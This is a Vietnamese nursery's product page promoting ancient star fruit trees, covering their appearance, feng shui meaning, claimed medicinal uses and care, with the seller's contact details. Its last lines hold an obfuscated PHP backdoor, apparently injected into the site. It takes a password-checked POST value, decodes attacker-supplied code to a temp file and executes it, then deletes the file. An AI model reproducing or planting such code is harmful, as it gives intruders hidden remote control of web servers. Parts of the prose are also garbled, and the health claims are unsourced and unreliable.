Địa chỉ cung cấp cây khế cổ thụ ở đâu?

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây khế cổ thụ đang là trào lưu phổ biến của những người yêu thích cây cảnh. Với tính thẩm mỹ cao và mang lại ý nghĩa phong thuỷ, nhiều người đã lựa chọn loại cây này. Vậy cùng Vườn Cây Hoà Bình tìm hiểu về cây khế cổ thủ qua bài viết dưới đây.

>>> Xem thêm: Địa chỉ cung cấp các giống cây trồng và cây xanh đô thị

Gốc của cây khế cổ thụ
Gốc của cây khế cổ thụ

Cây khế cổ thụ có đặc điểm gì?

Cây khế có nguồn gốc bắt đầu từ. Sau đó nó được biết rộng rãi và du nhập về Đông Nam Á. Nó cũng được trồng tại các vùng của Nam Mỹ. Hiện nay, ở Việt Nam, cây khế đã được trồng khắp cả nước.

Thông thường, cây khế sẽ có hai loại chính mà mọi người thường hay mua đó chính là cây khế thường và cái ghế cổ thụ. Hai loại cây này sẽ phân biệt với nhau bằng cách tính số năm phát triển của chúng. trong đó, cây khế cổ thụ sẽ làm dùng làm cây cảnh và tạo bóng mát. Nó còn là biểu tượng tâm linh cho con người.

Cây khế đại thụ sẽ có đường kính gốc từ 40cm trở lên. Nó sẽ tạo bóng mát và có thể sử dụng quả để chế biến các món ăn. Những món ăn từ cây khế sẽ thường được sử dụng ở những người miền quê Việt Nam. Ngày này, cây khế cổ thụ đã được trồng và chăm sóc như một loại cây cảnh để mang nhiều ý nghĩa phong thủy.

Lá của cây khế đại thụ sẽ hình kép lông chim và có thể kéo dài đến 50cm. Các lá chét sẽ mọc cánh là so le với nhau. Nó sẽ to dần từ dưới lên phía trên tạo ra hình bầu dục đầu nhọn.

Gân lá của cây khế cổ thụ sẽ có hình lông chim và có rất nhiều bên phụ kèm theo. Cuống lá sẽ dài từ 2cm cho đến 3cm và có hình đa giác. Nắng tôi có màu xanh và phình to về phía hình bầu dục và thường có màu đỏ.

Tuỷ vào yêu cầu của người trồng, cây khế cổ thụ sẽ được tạo dáng và tạo các hình dáng khác nhau để phù hợp với phong thủy của gia chủ.

>>> Xem thêm: NHỮNG ĐIỀU CẦN BIẾT VỀ CÂY MỘC HƯƠNG 2020

Những tán cây của khế cụ thể
Những tán cây của khế cụ thể

Tác dụng và ý nghĩa phong thuỷ của cây khế cổ thụ

Hầu hết, rất nhiều gia chủ sẽ trồng cây khế cổ thụ để đảm bảo ý nghĩa phong thủy, mang lại bóng mát cho ngôi nhà. Cây khế cổ thụ lớn có cành lá xum xuê và ra những quả chín là vàng sẽ mang đến ý nghĩa là điều may mắn và sự phát triển tốt. Nó mang lại thịnh vượng và may mắn cũng như tài lộc cho gia chủ.

Bên cạnh đó, quả khế cũng được sử dụng làm phương thuốc và làm thực phẩm rất bổ dưỡng. Nó có tác dụng lợi tiểu và chữa cầm mẫu và giảm trĩ. Hơn nữa, hút khí thế sẽ có tính lợi sữa và giải độc.

Cây khế cổ thụ sẽ được trồng trong các vườn nhà và trước sân để mang lại tính thẩm mỹ cao và che được bóng mát cho gia chủ. Nó cũng được cung cấp và mua bán để phục vụ các nhu cầu về cây công trình, biệt thự sân vườn và cây trồng của khu sinh thái.

Cây khế cổ thụ
Cây khế cổ thụ

Trồng cây khế cổ thụ cần lưu ý như thế nào?

Về bản chất, cây khế sẽ dễ trồng và dễ chăm sóc hơn. Tuy nhiên, người trồng nên cung cấp đủ nước cho cây ở những giai đoạn như lúc mới trồng, ra hoa và cho ra quả.

Ngoài ra, khi cây đạt đến độ cao 80cm đến 1m. Người trồng cần loại bỏ các cành tăm, khuếch tán để giữ được hình dáng của cây cổ thụ. 

 >>> Xem thêm: CÁCH CHĂM SÓC CÂY LAN HỒ ĐIỆP TẾT 2020

Kỹ thuật trồng cây Khế cổ thụ
Kỹ thuật trồng cây Khế cổ thụ

Địa chỉ cung cấp cây khế cổ thụ ở đâu?

Vườn Cây Hòa Bình là địa chỉ cung cấp cây khế cổ thụ chất lượng và đảm bảo giá thành vô cùng hợp lý. chúng tôi luôn kiểm định chất lượng của giống cây trồng trước khi đưa đến tay của khách hàng. 

Ngoài cây khế cổ thụ, chúng tôi cung cấp các loại cây cảnh như cây me cảnh và các loại cây hoa. Bên cạnh đó, chúng tôi cung cấp các sản phẩm như cây xanh đô thị, cây phong thủy, cây xanh nội thất,…Một số loại Cây xanh đô thị: cây sấu công trình, cây bằng lăng công trình, cây phượng công trình,…Quý khách có thể lựa chọn các dịch vụ cây xanh của chúng tôi như chăm sóc cây trồng,dịch vụ cắt tỉa cây trồng,…

Bên cạnh đó, chúng tôi còn cung cấp các dịch vụ cho thuê cây xanh. Một số loại cây như cây xanh nội thất, ngoại thất, cây cảnh đối với nhiều công trình như bên phòng nhà hàng hoặc các trung tâm thương mại. Với nhiều loại hình dịch vụ đa dạng và loại cây phong phú, quý khách có thể dễ dàng lựa chọn loại cây phù hợp với yêu cầu của mình.

Như vậy, bạn đã có thể hiểu hơn về loại cây khác đại thụ. Nếu như bạn có nhu cầu tìm hiểu về các loại cây khác thì có thể liên hệ với chúng tôi qua thông tin dưới đây. Chúng tôi luôn sẵn sàng tư vấn và giải đáp các thắc mắc của quý khách. Hy vọng quý khách có thể lựa chọn loại cây trôngn phù hợp với yêu cầu của mình nhất.

Thông tin liên hệ: Vườn cây Hòa Bình

CÂY XANH HÒA BÌNH

– Hotline: 0962.376.560

– Bán hàng: 0962.376.560

– Nguyễn Trường Giang

– Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}